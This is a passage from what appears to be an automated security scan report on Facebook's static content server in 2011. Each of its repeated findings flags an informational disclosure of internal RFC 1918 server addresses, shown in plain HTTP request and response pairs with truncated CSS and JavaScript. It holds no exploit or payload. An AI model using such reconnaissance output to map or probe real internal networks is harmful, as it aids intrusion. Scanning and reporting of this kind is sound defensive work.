/*1308413902,169776320*/

.sp_6u9n68{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z6/r/8QMWNfdKd75.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_641b
...[SNIP]...

24.67. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/z_rHQCDmDDh.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yI/r/z_rHQCDmDDh.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yI/r/z_rHQCDmDDh.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 05 Jul 2011 02:24:11 GMT
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 5394
Vary: Accept-Encoding
Cache-Control: public, max-age=30340216
Expires: Wed, 04 Jul 2012 18:48:05 GMT
Date: Tue, 19 Jul 2011 14:57:49 GMT
Connection: close

/*1309891665,169775814*/

.fbEigenpoll .fbEigenpollCheckbox{cursor:pointer;margin:4px 0 0 5px}
.fbEigenpoll .fbEigenpollCheckbox input{cursor:pointer;margin-left:1px}
.fbEigenpoll .fbEigenpollAddOptio
...[SNIP]...

24.68. http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yJ/r/rSJeTgoHNUS.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yJ/r/rSJeTgoHNUS.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:07 GMT
X-FB-Server: 10.138.64.185
Content-Length: 2085
Vary: Accept-Encoding
Cache-Control: public, max-age=30803318
Expires: Tue, 10 Jul 2012 03:26:07 GMT
Date: Tue, 19 Jul 2011 14:57:29 GMT
Connection: close

/*1310354828,176832697*/

.editFriendsHeader{padding:6px 0;margin-bottom:0}
.editFriendsHeader h2 .img{margin-top:2px}
.editFriendsPhonebookHeaderRight,.editFriendsHeaderNewList{margin-right:266px}
.e
...[SNIP]...

24.69. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yK/r/2oTj9mwQeS-.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yK/r/2oTj9mwQeS-.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:19:08 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 7448
Vary: Accept-Encoding
Cache-Control: public, max-age=30198271
Expires: Tue, 03 Jul 2012 03:21:59 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1309749721,169776065*/

.UINarrowFrame_Container{width:560px;padding:0;overflow:hidden}
.UINarrowFrame_FullWidth{width:600px}
.UINarrowFrame_CenterPage{margin:0 auto}
#ci_module_list{background-colo
...[SNIP]...

24.70. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/xrEeXUiCo9E.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yK/r/xrEeXUiCo9E.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yK/r/xrEeXUiCo9E.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sun, 07 Mar 2010 19:11:20 -0800
X-Powered-By: HPHP
X-FB-Server: 10.138.69.182
Vary: Accept-Encoding
Content-Length: 530
Cache-Control: public, max-age=20002358
Expires: Wed, 07 Mar 2012 03:10:35 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

/*1299553880,176833974*/

if (window.CavalryLogger) { CavalryLogger.start_js(["uKqhc"]); }

function collect_data_attribs(e,i){var g={};var d={};var h=i.length;var f;for(f=0;f<h;++f){g[i[f]]={};d[i[f]
...[SNIP]...

24.71. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/Kc1c3lfdICw.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yL/r/Kc1c3lfdICw.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yL/r/Kc1c3lfdICw.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 12 Jul 2011 04:53:04 GMT
X-FB-Server: 10.138.69.186
Content-Length: 7140
Vary: Accept-Encoding
Cache-Control: public, max-age=30903304
Expires: Wed, 11 Jul 2012 07:13:21 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310454707,176833978*/

table.component_table{padding-left:5px;padding-top:5px}
table.component_table td.icons{width:20px;text-align:center;vertical-align:middle}
table.component_table td.content{wh
...[SNIP]...

24.72. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/a1RB0wRyoBD.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yL/r/a1RB0wRyoBD.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yL/r/a1RB0wRyoBD.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 21:02:29 GMT
X-FB-Server: 10.138.16.185
Content-Length: 7762
Vary: Accept-Encoding
Cache-Control: public, max-age=31040045
Expires: Thu, 12 Jul 2012 21:12:44 GMT
Date: Tue, 19 Jul 2011 14:58:39 GMT
Connection: close

/*1310591557,176820409*/

.fbChatOrderedList{position:absolute;bottom:0;left:0;right:0;top:0}
.fbChatOrderedList .item{float:left;width:100%}
.fbChatOrderedList .item a{color:#333;display:block;paddin
...[SNIP]...

24.73. http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/HTDWQBuWGI8.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yM/r/HTDWQBuWGI8.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yM/r/HTDWQBuWGI8.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:03:33 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 336
Cache-Control: public, max-age=30201067
Expires: Tue, 03 Jul 2012 04:09:51 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1309752509,169776069*/

.sp_26r8dm{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zn/r/uj8P9iaJ2UQ.png);background-repeat:no-repeat;display:inline-block;height:45px;width:24px}
.sx_a42d
...[SNIP]...

24.74. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yN/r/ur_c5XpT6zc.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yN/r/ur_c5XpT6zc.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:34:57 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 8050
Vary: Accept-Encoding
Cache-Control: public, max-age=30209240
Expires: Tue, 03 Jul 2012 06:24:49 GMT
Date: Tue, 19 Jul 2011 14:57:29 GMT
Connection: close

/*1309760625,169776066*/

.contact_importer_widget.ci_nateon .nateon_username{width:96px}
.contact_importer_widget.ci_nateon .nateon_domain{width:80px}
#welcome_dashboard li{padding:10px 0 5px 0}
#wel
...[SNIP]...

24.75. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yO/r/O4MC2pFJMzJ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yO/r/O4MC2pFJMzJ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Apr 2011 03:21:50 GMT
X-FB-Server: 10.138.16.184
Vary: Accept-Encoding
Content-Length: 677
Cache-Control: public, max-age=23599923
Expires: Tue, 17 Apr 2012 18:30:45 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1303151506,176820408*/

.showOtherMasher:hover{background-color:#edeff4;cursor:pointer}
.showOtherMasher a{display:block;padding-bottom:8px;padding-top:6px}
.showOtherMasher:hover a{text-decoration:
...[SNIP]...

24.76. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/j6Y0USeru-T.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yO/r/j6Y0USeru-T.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yO/r/j6Y0USeru-T.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:24:53 GMT
X-FB-Server: 10.138.64.186
Content-Length: 17207
Vary: Accept-Encoding
Cache-Control: public, max-age=29004111
Expires: Tue, 19 Jun 2012 07:40:32 GMT
Date: Tue, 19 Jul 2011 14:58:41 GMT
Connection: close

/*1308555638,176832698*/

.profile_box .reviews{padding-bottom:15px}
.Reviews_Row{padding-bottom:6px;border-bottom:1px solid #eee;margin-bottom:6px;font-size: 13px;line-height:16px}
.Reviews_Row .Revi
...[SNIP]...

24.77. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/FnGB7tUxwE3.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yP/r/FnGB7tUxwE3.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yP/r/FnGB7tUxwE3.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 20 May 2011 02:02:10 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 1454
Vary: Accept-Encoding
Cache-Control: public, max-age=29719300
Expires: Wed, 27 Jun 2012 14:20:23 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309270829,169776067*/

.answerText{font-size: 11px;line-height:16px;word-wrap:normal}
.answerText p{padding:0;margin:0}
.answerText blockquote{margin:10px 0;padding:0 0 0 10px;border-left:solid 2px
...[SNIP]...

24.78. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yP/r/aBJXPgldonq.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yP/r/aBJXPgldonq.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:07 GMT
X-FB-Server: 10.138.16.183
Content-Length: 3247
Vary: Accept-Encoding
Cache-Control: public, max-age=30807879
Expires: Tue, 10 Jul 2012 04:42:09 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

/*1310359292,176820407*/

.fbMarketingBlock{display:inline-block;vertical-align:top}
.fbMarketingBlock1Column{width:67px}
.fbMarketingBlock2Column{width:150px}
.fbMarketingBlock3Column{width:233px}
.f
...[SNIP]...

24.79. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/c6emPCFfPcn.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yP/r/c6emPCFfPcn.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yP/r/c6emPCFfPcn.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:56:24 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 1175
Vary: Accept-Encoding
Cache-Control: public, max-age=28992811
Expires: Tue, 19 Jun 2012 04:32:16 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1308544405,169776069*/

.event_profile .event_upload_image{width:179px}
.event_profile #rsvp_form{display:inline}
.event_profile .event_guestlist .uiHeaderNav{margin-left:0}
.event_profile .event_gu
...[SNIP]...

24.80. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/hkM0mPGHIE1.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yP/r/hkM0mPGHIE1.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yP/r/hkM0mPGHIE1.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:25:52 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 825
Cache-Control: public, max-age=30197295
Expires: Tue, 03 Jul 2012 03:06:59 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1309748911,169776319*/

.sp_14cyr8{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/Y2hvkMjCrcT.png);background-repeat:no-repeat;display:inline-block;height:12px;width:12px}
.sx_cbd1
...[SNIP]...

24.81. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9d2D5n1k9ZB.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yQ/r/9d2D5n1k9ZB.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yQ/r/9d2D5n1k9ZB.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:25:52 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Content-Length: 1730
Vary: Accept-Encoding
Cache-Control: public, max-age=30931950
Expires: Wed, 11 Jul 2012 15:10:24 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1310483520,169775557*/

.sp_1n2jz6{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z1/r/qcTMR8qeslF.png);background-repeat:no-repeat;display:inline-block;height:105px;width:195px}
.sx_e4
...[SNIP]...

24.82. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/KdKjGooM6-s.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yQ/r/KdKjGooM6-s.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yQ/r/KdKjGooM6-s.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:54:08 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 1461
Vary: Accept-Encoding
Cache-Control: public, max-age=29119119
Expires: Wed, 20 Jun 2012 15:37:24 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1308670806,169776319*/

.sitetourChat_Header{padding:45px 0 41px;width:977px}
.sitetourChat_Header .sitetourChat_InnerWelcome{color:#203360;display:table-cell;padding:87px 0 0 47px}
.sitetourChat_He
...[SNIP]...

24.83. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/7mqITnKP1S_.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yR/r/7mqITnKP1S_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yR/r/7mqITnKP1S_.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:31 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 1318
Vary: Accept-Encoding
Cache-Control: public, max-age=23674726
Expires: Wed, 18 Apr 2012 15:16:40 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1303226195,169775556*/

.privacy_guide .main_body{background-color:#fff;border:1px solid #ccc;padding:50px;width:700px}
.privacy_guide .title{font-size: 34px;font-weight:normal;padding-bottom:2px}
.
...[SNIP]...

24.84. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/Sg28aMjfbGK.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yR/r/Sg28aMjfbGK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yR/r/Sg28aMjfbGK.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:07 GMT
X-FB-Server: 10.138.16.184
Content-Length: 3683
Vary: Accept-Encoding
Cache-Control: public, max-age=30831586
Expires: Tue, 10 Jul 2012 11:17:16 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

/*1310382928,176820408*/

.MobileHub_More{font-size: 16px;font-weight:bold;padding:10px 10px 0}
.MobileHub_Body{padding:15px 0;width:960px}
.UIPage_LoggedOut .mobile_hub{margin-top:-130px;padding-top:
...[SNIP]...

24.85. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yR/r/bQKCJas2cuT.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yR/r/bQKCJas2cuT.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 06 Jun 2011 02:36:29 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 12229
Vary: Accept-Encoding
Cache-Control: public, max-age=27777752
Expires: Tue, 05 Jun 2012 02:59:46 GMT
Date: Tue, 19 Jul 2011 14:57:14 GMT
Connection: close

/*1307329191,169776069*/

#captcha fieldset{border-top:1px solid #c0c0c0;border-bottom:1px solid #c0c0c0;margin:0;padding:10px}
#captcha legend{color:#808080}
#captcha .divider{display:none}
#captcha
...[SNIP]...

24.86. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/cwpj7clVond.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yR/r/cwpj7clVond.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yR/r/cwpj7clVond.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/directory/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 22 Jun 2011 01:45:27 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 2462
Vary: Accept-Encoding
Cache-Control: public, max-age=29594057
Expires: Tue, 26 Jun 2012 03:31:52 GMT
Date: Tue, 19 Jul 2011 14:57:35 GMT
Connection: close

/*1309145608,169775812*/

.fbDirectoryBoxColumn{float:left;font-size: 13px;width:145px}
.directory .header{float:left;line-height:16px;padding:20px 0 10px 20px;width:650px}
.directory .header p{margin
...[SNIP]...

24.87. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/fM3yrUPcjJi.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yU/r/fM3yrUPcjJi.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yU/r/fM3yrUPcjJi.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
